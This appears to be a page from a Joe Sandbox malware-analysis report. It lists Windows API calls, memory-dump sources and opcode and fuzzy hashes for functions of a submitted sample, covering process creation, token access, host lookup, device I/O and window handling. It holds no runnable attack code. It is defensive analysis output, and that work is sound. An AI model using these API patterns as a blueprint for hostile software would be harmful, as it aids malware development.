Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 4f2f426649c9b06dab2e681618cd6aca8f7c7477aa23c99fcb5ed192f91cdcaf
Instruction ID: 5e42b18469a07a81debafe31f7d94ce7ebf41b64585e1847b153d73e9528dd84
Opcode Fuzzy Hash: 4f2f426649c9b06dab2e681618cd6aca8f7c7477aa23c99fcb5ed192f91cdcaf
Instruction Fuzzy Hash: 07119432604A15EECF212F70AC496593B94AF153E4F10862AFD4A961B1DBFD89409661

Function 00744531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00744560

Part of subcall function 0074410D: _memset.LIBCMT ref: 0074418D
Part of subcall function 0074410D: _wcscpy.LIBCMT ref: 007441E1
Part of subcall function 0074410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007441F1

KillTimer.USER32(?,00000001,?,?), ref: 007445B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007445C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0077D6CE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f267a83dfa9f88815ec7c4271f9faafe5ba804f6233d74bf281089efeef3c994
Instruction ID: 7df043445d0906c8004bf9fd05ab79b406b0b73c1b0b92bdb6d3a98b61a0e016
Opcode Fuzzy Hash: f267a83dfa9f88815ec7c4271f9faafe5ba804f6233d74bf281089efeef3c994
Instruction Fuzzy Hash: 4921C270904784AFEF328B249859BE7BBECAF01348F04409EE69E96281C77C5E949B51

Function 007A40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007A40D1
_memset.LIBCMT ref: 007A40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007A4144
CloseHandle.KERNEL32(00000000), ref: 007A414D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: f499394b5cddf7acc9c154a58843676d7be129c5a99e6896843a6154b2675ac8
Instruction ID: 39c27562ab47db2eebd46248b6d7757ad50ec2f3c8b8f574687a64adf9f1219a
Opcode Fuzzy Hash: f499394b5cddf7acc9c154a58843676d7be129c5a99e6896843a6154b2675ac8
Instruction Fuzzy Hash: 9311CD7590122CBAD7305BA59C4DFABBB7CEF85760F1042DAF908D7180D6744E84CBA4

Function 007B667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007A7B20,?,?,00000000), ref: 00745B8C
Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007A7B20,?,?,00000000,?,?), ref: 00745BB0

gethostbyname.WSOCK32(?), ref: 007B66AC
WSAGetLastError.WSOCK32(00000000), ref: 007B66B7
_memmove.LIBCMT ref: 007B66E4
inet_ntoa.WSOCK32(?), ref: 007B66EF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: adf94f281a4731fe6de65218ec650c5a30b4f6252c391fe0b838e2dbcde9ff99
Instruction ID: ad248c78cf9b84b9a42a4978ae4085ed26107bb303971c39b84bffca28c25b01
Opcode Fuzzy Hash: adf94f281a4731fe6de65218ec650c5a30b4f6252c391fe0b838e2dbcde9ff99
Instruction Fuzzy Hash: 44116075500509EFCF00EBA4DD8ADEEB7B9EF44310B148169F602A7262DF38AE04CB61

Function 00799023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00799043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00799055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00799086

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e3722dbe89a1302faa954764fa9e3fc6126f9d4cd1af7e18371f17f0cad8b5dd
Instruction ID: b39901bfb8d28c8efbc25143fd1186a1a38644925ececa353c76752a95c9c4af
Opcode Fuzzy Hash: e3722dbe89a1302faa954764fa9e3fc6126f9d4cd1af7e18371f17f0cad8b5dd
Instruction Fuzzy Hash: 43114C79901219FFEF10DFA9CD84EADBB74FB48310F204095EA14B7250D6726E10DB94

Function 00741290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

DefDlgProcW.USER32(?,00000020,?), ref: 007412D8
GetClientRect.USER32(?,?), ref: 0077B84B
GetCursorPos.USER32(?), ref: 0077B855
ScreenToClient.USER32(?,?), ref: 0077B860

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: b431a5a1d272982e91794927272e8188b988dbe40d44c1b6be276427b64aa9ff
Instruction ID: c77063db669665edc4901cc3214cb83a643e95975e715fad8770b132bbe16868
Opcode Fuzzy Hash: b431a5a1d272982e91794927272e8188b988dbe40d44c1b6be276427b64aa9ff
Instruction Fuzzy Hash: 0B112835A00119EFCB00EF94D889DFE77B9FB05301F40445AFA11E7151D778AAA1CBA9

Function 007A1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A169E
Sleep.KERNEL32(?,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A16D1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 62f04605c4595e56679eb5c187fea0be70a44ca90a790f3e2a0c902f6b442962
Instruction ID: 474f8f49fd513a95e15ff8858d87ab01ca6f48eecd8c33015d5dd231f6668cff
Opcode Fuzzy Hash: 62f04605c4595e56679eb5c187fea0be70a44ca90a790f3e2a0c902f6b442962
Instruction Fuzzy Hash: F2117C31C0191CDBDF009FA5D848AEEBB78FF4A711F49819AE940F2240CF3895608BDA

Function 00777207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0077722B

Part of subcall function 00777912: __fltout2.LIBCMT ref: 0077793B

__cftog_l.LIBCMT ref: 00777251
__cftoe_l.LIBCMT ref: 00777283

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 98cb650a2b01869feabb8e380e114efbd1f55ca825365066dcf8ba4276fa3273
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: F701403614414AFBCF1A5E84CC458EE3F72BF59391B588525FA2C98032D63BC9B1EB81

Function 007CB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007CB59E
ScreenToClient.USER32(?,?), ref: 007CB5B6
ScreenToClient.USER32(?,?), ref: 007CB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007CB5F5

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: d102a054c36addc374f7ff2c95d61e1d36de5dd4ea6b762e8d30d876eaf7f502
Instruction ID: 1c75c841e6cf48826f286e13128986b6a699e24853afe4280d608b1c485ae63b
Opcode Fuzzy Hash: d102a054c36addc374f7ff2c95d61e1d36de5dd4ea6b762e8d30d876eaf7f502
Instruction Fuzzy Hash: 321146B5D00209EFDB41CF99D444AEEFBB5FB08310F10816AE954E3220D735AA658F54

Function 007CB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007CB8FE
_memset.LIBCMT ref: 007CB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00807F20,00807F64), ref: 007CB93C
CloseHandle.KERNEL32 ref: 007CB94E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 74e675c67c67d885790674d6ad6795c24be7077965792346ba0829475b59eef1
Instruction ID: 2fad0ccc65ea16fef66cf250ce04a9a8ce2e6b48d046948b6565d10b41ce5c80
Opcode Fuzzy Hash: 74e675c67c67d885790674d6ad6795c24be7077965792346ba0829475b59eef1
Instruction Fuzzy Hash: 08F05EB2948341BBE2502761AC0AFBB3B5DFB08354F004025FB08E61A2DF79690487A8

Function 007A6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007A6E88

Part of subcall function 007A794E: _memset.LIBCMT ref: 007A7983

_memmove.LIBCMT ref: 007A6EAB
_memset.LIBCMT ref: 007A6EB8
LeaveCriticalSection.KERNEL32(?), ref: 007A6EC8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: aaf7627902f3265ea59f92ff649e95dc2fac21bab9daac6dce4b56294d3b8925
Instruction ID: b7c3ecfa44d4ec5384754d6cc381090e61b38fdf2630ccf7526f1e58e4a883a3
Opcode Fuzzy Hash: aaf7627902f3265ea59f92ff649e95dc2fac21bab9daac6dce4b56294d3b8925
Instruction Fuzzy Hash: 65F0543A104200EBCF416F55DC89E4ABB2AEF45320B04C065FE095E226C735A911CBB5

Function 007CC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 007412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0074134D
Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074135C
Part of subcall function 007412F3: BeginPath.GDI32(?), ref: 00741373
Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CC030
LineTo.GDI32(00000000,?,?), ref: 007CC03D
EndPath.GDI32(00000000), ref: 007CC04D
StrokePath.GDI32(00000000), ref: 007CC05B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 37aeb21c089969fdca95389306b63901c3155620bb97a69daa67283a36125605
Instruction ID: db9237979d7c5d9f5dd0af28cb71ebf73e8b75c8ead8222316237adcde0ab908
Opcode Fuzzy Hash: 37aeb21c089969fdca95389306b63901c3155620bb97a69daa67283a36125605
Instruction Fuzzy Hash: E6F05E31101259FBDB126F54AC0AFCE3F5ABF05711F148018FA15610E287B955A1DB99

Function 0079A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0079A3AC
GetCurrentThreadId.KERNEL32 ref: 0079A3B3
AttachThreadInput.USER32(00000000), ref: 0079A3BA

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ed21ec9c400686654b7c8d6228ded7c3ff3f68ee4ec8bba2e3c6275c00253205
Instruction ID: 9c2614a48a71e7752fb2d6b973f754b5cd82ddcb035724aff6ea95deae156d33
Opcode Fuzzy Hash: ed21ec9c400686654b7c8d6228ded7c3ff3f68ee4ec8bba2e3c6275c00253205
Instruction Fuzzy Hash: 89E03931142228BADB201BA2EC0CED73F2DEF167A1F008029F90894060C6798540CBE5

Function 00742218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00742231
SetTextColor.GDI32(?,000000FF), ref: 0074223B
SetBkMode.GDI32(?,00000001), ref: 00742250
GetStockObject.GDI32(00000005), ref: 00742258
GetWindowDC.USER32(?,00000000), ref: 0077C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0077C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0077C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0077C112
GetPixel.GDI32(00000000,?,?), ref: 0077C132
ReleaseDC.USER32(?,00000000), ref: 0077C13D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: c7d5624d19990824bfa199254b4fe965f5834790fba69f9c566e470b24da9265
Instruction ID: 38e4ee7ac2a5822900d64f1e102f22eeff128838af845a970621a7e425d450f7
Opcode Fuzzy Hash: c7d5624d19990824bfa199254b4fe965f5834790fba69f9c566e470b24da9265
Instruction Fuzzy Hash: 30E03932200648EFDF215F68FC09BD83B11AB05332F04C36AFA69880E187794990DB11

Function 00798C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00798C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0079882E), ref: 00798C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0079882E), ref: 00798C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0079882E), ref: 00798C7E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3aec29adbe43c5176921c26f765fceb1ee9ccd0d4ec30f7da7d50246bac00c4a
Instruction ID: 15990e1180760ff114643c5f4e8703a680d183b2922dfa07465d10c7aee78205
Opcode Fuzzy Hash: 3aec29adbe43c5176921c26f765fceb1ee9ccd0d4ec30f7da7d50246bac00c4a
Instruction Fuzzy Hash: 21E08676642211EBDB605FB06E0CF563BADFF52B92F04886CF645C9040DA3C8485CB75

Function 00782187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00782187
GetDC.USER32(00000000), ref: 00782191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007821B1
ReleaseDC.USER32(?), ref: 007821D2

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ed85c289937750f5177b46f7d94c7880a5c88a651b9bbe235d34a4c94f34c689
Instruction ID: f563002d66813fb2c2ca4ae3b7811a77364d8e058555c3e641962d0e848c09d4
Opcode Fuzzy Hash: ed85c289937750f5177b46f7d94c7880a5c88a651b9bbe235d34a4c94f34c689
Instruction Fuzzy Hash: 52E0E5B5800204EFDB41AF60C808A9D7BB2EB4C351F10C429F95AA7260CB3C91429F45

Function 0078219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

